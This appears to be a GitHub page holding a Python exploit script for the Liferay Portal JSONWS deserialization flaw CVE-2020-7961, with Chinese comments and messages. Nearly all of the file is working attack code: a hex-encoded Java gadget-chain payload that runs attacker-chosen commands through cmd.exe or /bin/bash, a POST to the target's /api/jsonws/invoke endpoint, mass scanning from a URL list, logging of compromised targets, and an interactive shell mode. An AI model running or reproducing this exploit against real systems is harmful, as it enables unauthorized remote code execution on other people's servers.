forked from VulnExpo/ExploitHunter
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathLiferay_CVE-2020-7961_Exploit_v4.py
90 lines (78 loc) · 13.5 KB
/
Liferay_CVE-2020-7961_Exploit_v4.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
# 作者: VulnExpo
# 日期: 2023-10-9
import sys
import argparse
import requests
import time
import json
import re
from urllib.parse import urlparse
import random
requests.packages.urllib3.disable_warnings()
def check_for_vulnerability(url, cmd, interactive=False, proxies={}, success_file=None):
try:
payload = 'ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000001103CAFEBABE0000003100DD0A0036006C0A006D006E0A006F00700700710800720A007300740A007500760A007500770700780800790A0009007A08007B07007C0A000D006C08007D0A007E007F0A008000810800820A008000830800840B0085008608008708008808008907008A0A0019008B0A0019008C0A0019008D07008E07008F0A009000910A001E00920A001D00930700940A0022006C0A001D00950A002200960800970700980A0027006C0800990A0027009A0A0022009B0A0027009B0A0009009C0A009D009E08009F0A008000A00A00A100A20A00A100A30700A40A003300A50700A60700A70100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004636D64730100104C6A6176612F7574696C2F4C6973743B01000769734C696E75780100015A0100056F735479700100124C6A6176612F6C616E672F537472696E673B01000E70726F636573734275696C64657201001A4C6A6176612F6C616E672F50726F636573734275696C6465723B01000470726F630100134C6A6176612F6C616E672F50726F636573733B01000262720100184C6A6176612F696F2F42756666657265645265616465723B01000273620100184C6A6176612F6C616E672F537472696E674275666665723B0100046C696E65010006726573756C74010008726573706F6E73650100284C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B01000C6F757470757453747265616D0100234C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B01000E73657276696365436F6E746578740100324C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B0100037265710100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0100097265715F6669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000B63757272656E745F7265710100274C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573743B010003636D6401000265780100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100124C7061796C6F61642F63625F74656D706C3B0100164C6F63616C5661726961626C65547970655461626C650100244C6A6176612F7574696C2F4C6973743C4C6A6176612F6C616E672F537472696E673B3E3B01000A457863657074696F6E730100097472616E73666F726D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B0100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000D63625F74656D706C2E6A6176610C003700380700A80C00A900AA0700AB0C00AC00AD01002B6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F52657175657374466163616465010007726571756573740700AE0C00AF00B00700B10C00B200B30C00B400B50100256F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526571756573740100026A6B0C00B600B70100000100136A6176612F7574696C2F41727261794C6973740100076F732E6E616D650700B80C00B900B70700BA0C00BB00BC01000377696E0C00BD00BE010007636D642E6578650700BF0C00C000C10100022F630100092F62696E2F626173680100022D630100186A6176612F6C616E672F50726F636573734275696C6465720C003700C20C00C300C40C00C500C60100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D5265616465720700C70C00C800C90C003700CA0C003700CB0100166A6176612F6C616E672F537472696E674275666665720C00CC00BC0C00CD00CE0100010A0100176A6176612F6C616E672F537472696E674275696C6465720100037E7E7E0C00CD00CF0C00D000BC0C00D100D20700D30C00D400D50100057574662D380C00D600D70700D80C00D900DA0C00DB00380100136A6176612F6C616E672F457863657074696F6E0C00DC00380100107061796C6F61642F63625F74656D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C657401003B636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578745468726561644C6F63616C01001167657453657276696365436F6E7465787401003428294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E746578743B010030636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F736572766963652F53657276696365436F6E7465787401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000F6A6176612F6C616E672F436C6173730100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100106A6176612F6C616E672F53797374656D01000B67657450726F70657274790100106A6176612F6C616E672F537472696E6701000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000E6A6176612F7574696C2F4C697374010003616464010015284C6A6176612F6C616E672F4F626A6563743B295A010013284C6A6176612F7574696C2F4C6973743B295601001372656469726563744572726F7253747265616D01001D285A294C6A6176612F6C616E672F50726F636573734275696C6465723B010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E65010006617070656E6401002C284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275666665723B01002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B010008746F537472696E6701000B676574526573706F6E736501002A28294C6F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E73653B0100266F72672F6170616368652F636174616C696E612F636F6E6E6563746F722F526573706F6E736501000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B0100086765744279746573010016284C6A6176612F6C616E672F537472696E673B295B420100216A617661782F736572766C65742F536572766C65744F757470757453747265616D0100057772697465010005285B422956010005636C6F736501000F7072696E74537461636B547261636500210035003600000000000300010037003800020039000002B7000500110000013D2AB70001B800024C2BB600034D12041205B600064E2D04B600072D2CB60008C000093A041904120AB6000B3A051905C601051905120CA500FEBB000D59B7000E3A06043607120FB800103A081908C600131908B600111212B6001399000603360715079A002419061214B9001502005719061216B9001502005719061905B90015020057A7002119061217B9001502005719061218B9001502005719061905B90015020057BB0019591906B7001A3A09190904B6001B571909B6001C3A0ABB001D59BB001E59190AB6001FB70020B700213A0BBB002259B700233A0C190BB60024593A0DC60013190C190DB600251226B6002557A7FFE8BB002759B700281229B6002A190CB6002BB6002A1229B6002AB6002C3A0E1904B6002D3A0F190FB6002E3A101910190E122FB60030B600311910B60032A700084C2BB60034B1000100040134013700330003003A0000009200240000001A0004001C0008001D000D001E0015001F001A002000240022002D0023003900240042002500450026004C0027005E00280061002A0066002B0070002C007A002D0087002F00910030009B003100A5003400B0003500B7003600BE003800D3003900DC003C00E7003D00F7004001150041011C004201230043012F00440134004A0137004801380049013C004B003B000000B60012004200F2003C003D0006004500EF003E003F0007004C00E800400041000800B0008400420043000900BE007600440045000A00D3006100460047000B00DC005800480049000C00E40050004A0041000D0115001F004B0041000E011C0018004C004D000F01230011004E004F00100008012C005000510001000D01270052005300020015011F00540055000300240110005600570004002D0107005800410005013800040059005A00010000013D005B005C0000005D0000000C0001004200F2003C005E0006005F000000040001003300010060006100010039000000490000000400000001B100000002003A0000000600010000004E003B0000002A000400000001005B005C0000000000010062006300010000000100640065000200000001006600670003000100600068000100390000003F0000000300000001B100000002003A00000006000100000051003B00000020000300000001005B005C000000000001006200630001000000010066006900020001006A00000002006B70740006747231706C65707701007871007E000D78'
post_data = (
'cmd={"/expandocolumn/update-column":{}}&p_auth=test&formDate=2020&columnId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:'+payload+';"}'
)
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
"jk": cmd
}
api_url = '{url}/api/jsonws/invoke'.format(url=url)
resp = requests.post(url=api_url, data=post_data, headers=headers, timeout=60, verify=False, allow_redirects=False)
pattern = '~~~(.*?)~~~'
match = re.search(pattern, resp.content.decode('utf-8'), re.S | re.I)
if match:
result = match.group(1)
result = result.strip()
with open(success_file, 'a') as s_file:
s_file.write(f"++++++++++++++++++\n")
s_file.write(f"目标URL: {url}\n")
s_file.write(f"Payload: {cmd}\n")
s_file.write(f"响应内容:\n{result}\n\n")
if interactive:
print(f"目标URL: {url}")
print(f"Payload: {cmd}")
print(f"响应内容:\n{result}\n")
while True:
user_input = input("请输入要执行的命令或输入'exit'退出: ")
if user_input == 'exit':
break
interactive_cmd = user_input.strip()
interactive_result = check_for_vulnerability(url, interactive_cmd, False, proxies, success_file)
if interactive_result:
print(f"响应内容:\n{interactive_result}\n")
return result # 返回结果字符串
except Exception as e:
print(f"发生异常:{e}")
return None
def scan_targets(targets, cmd, interactive=False, proxies={}, success_file=None):
for target in targets:
target = target.strip()
check_for_vulnerability(target, cmd, interactive, proxies, success_file)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Liferay Portal JSONS反序列化漏洞CVE-2020-7961")
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
parser.add_argument("-c", "--cmd", help="要执行的命令")
parser.add_argument("-i", "--interactive", action="store_true", help="启用交互式Shell模式")
args = parser.parse_args()
if not args.url and not args.file:
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
exit(1)
if args.url:
urls = [args.url]
elif args.file:
with open(args.file, 'r') as file:
urls = file.readlines()
proxies = {}
success_file = 'success_targets.txt'
for url in urls:
url = url.strip()
if not url.startswith("http://") and not url.startswith("https://"):
scan_targets(["http://" + url, "https://" + url], args.cmd, args.interactive, proxies, success_file)
else:
scan_targets([url], args.cmd, args.interactive, proxies, success_file)
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")